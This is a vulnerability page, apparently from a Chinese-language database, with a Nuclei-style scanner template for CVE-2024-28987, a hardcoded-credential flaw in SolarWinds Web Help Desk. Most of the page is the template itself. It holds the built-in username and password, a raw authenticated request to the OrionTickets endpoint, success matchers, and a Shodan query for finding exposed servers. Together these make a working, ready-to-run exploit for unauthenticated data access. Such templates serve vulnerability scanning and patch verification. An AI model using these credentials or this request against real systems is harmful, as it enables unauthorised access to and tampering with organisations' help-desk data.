漏洞描述
The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data.
CVE-2024-28987: SolarWinds Web Help Desk - Hardcoded Credential
PoC代码[已公开]
id: CVE-2024-28987
info:
name: SolarWinds Web Help Desk - Hardcoded Credential
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data.
reference:
- https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2
- https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987
- https://nvd.nist.gov/vuln/detail/CVE-2024-28987
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-28987
cwe-id: CWE-798
epss-score: 0.94221
epss-percentile: 0.99918
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:1895809524
tags: cve,cve2024,exposure,solarwinds,help-desk,kev,vkev
variables:
username: "helpdeskIntegrationUser"
password: "dev-C4F8025E7"
http:
- raw:
- |
GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username+':'+password)}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: body
words:
- displayClient
- shortDetail
condition: and
- type: status
status:
- 200
# digest: 490a0046304402200b27053cd1be9672d47df237bb8a78e7a873459416f2d76abcbe18e50b18501302207883312086e487b67b2d89e2c4a09f539abea4f0ee198903c672381488c4bf16:922c64590222798bb761d5b6d8e72950